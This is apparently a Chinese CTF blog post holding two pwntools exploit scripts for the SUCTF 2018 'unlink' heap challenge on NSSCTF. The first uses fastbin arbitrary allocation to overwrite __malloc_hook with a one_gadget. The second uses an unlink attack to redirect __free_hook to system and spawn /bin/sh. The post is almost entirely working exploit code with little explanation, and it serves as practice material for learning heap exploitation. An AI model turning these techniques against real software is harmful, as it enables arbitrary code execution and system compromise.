练习4 | 0xa6's bolg

[SUCTF 2018 招新赛]unlink

题目链接 : https://www.nssctf.cn/problem/2334
Ubuntu 16.04

Arbitrary Alloc打法

from pwn import *

io = remote("node4.anna.nssctf.cn", 28179)
#io = process("./service")
elf = ELF("./service")
libc = ELF("./libc-2.23.so")
context(os='linux', arch='amd64')
#context.log_level='debug'
def debug():
    gdb.attach(io)

def malloc(size):
    io.sendlineafter(b'5. exit\n', b'1')
    io.sendlineafter(b'please input the size : ', str(size).encode())

def free(idx):
    io.sendlineafter(b'5. exit\n', b'2')
    io.sendlineafter(b'which node do you want to delete', str(idx).encode())

def show(idx):
    io.sendlineafter(b'5. exit\n', b'3')
    io.sendlineafter(b'which node do you want to show', str(idx).encode())

def edit(idx, message):
    io.sendlineafter(b'5. exit\n', b'4')
    io.sendlineafter(b'which one do you want modify :', str(idx).encode())
    io.sendafter(b'please input the content', message)

malloc(0x10) #0
malloc(0x80) #1
malloc(0x60) #2
malloc(0x60) #3
free(1)
payload = b'a' * 0x20
edit(0, payload)
show(0)
libc_base = u64(io.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00')) - 0x68 - libc.sym["__malloc_hook"]
print(f'libc:{hex(libc_base)}')
one_gadget = 0x4527a + libc_base
free(3)
payload = b'a' * 0x68 + p64(0x71) + p64(libc_base + libc.sym["__malloc_hook"] - 0x1b - 0x8)
edit(2, payload)
malloc(0x60) #1
malloc(0x60) #3
payload = b'a' * 0xb + p64(one_gadget) + p64(libc_base + libc.sym["realloc"] + 8)
edit(3, payload)
malloc(0x10)
#debug()
io.interactive()

unlink打法

from pwn import *

io = remote("node4.anna.nssctf.cn", 28265)
#io = process("./service")
elf = ELF("./service")
libc = ELF("./libc-2.23.so")
context(os='linux', arch='amd64')
#context.log_level='debug'
def debug():
    gdb.attach(io)

def malloc(size):
    io.sendlineafter(b'5. exit\n', b'1')
    io.sendlineafter(b'please input the size : ', str(size).encode())

def free(idx):
    io.sendlineafter(b'5. exit\n', b'2')
    io.sendlineafter(b'which node do you want to delete', str(idx).encode())

def show(idx):
    io.sendlineafter(b'5. exit\n', b'3')
    io.sendlineafter(b'which node do you want to show', str(idx).encode())

def edit(idx, message):
    io.sendlineafter(b'5. exit\n', b'4')
    io.sendlineafter(b'which one do you want modify :', str(idx).encode())
    io.sendafter(b'please input the content', message)


buf = 0x6020C0
malloc(0x30)
malloc(0x80)
malloc(0x30)
free(1)
payload = b'a' * 0x40
edit(0, payload)
show(0)
libc_base = u64(io.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00')) - 0x68 - libc.sym["__malloc_hook"]
print(f'libc:{hex(libc_base)}')
payload = b'a' * 0x38 + p64(0x91)
edit(0, payload)
malloc(0x80)
payload = p64(0) + p64(0x31) + p64(buf - 0x18) + p64(buf - 0x10) + p64(0) * 2 + p64(0x30) + p64(0x90)
edit(0, payload)
free(1)
payload = p64(0) * 3 + p64(libc.sym["__free_hook"] + libc_base)
edit(0, payload)
payload = p64(libc_base + libc.sym["system"])
edit(0, payload)
edit(2, b'/bin/sh\x00')
free(2)
#debug()
io.interactive()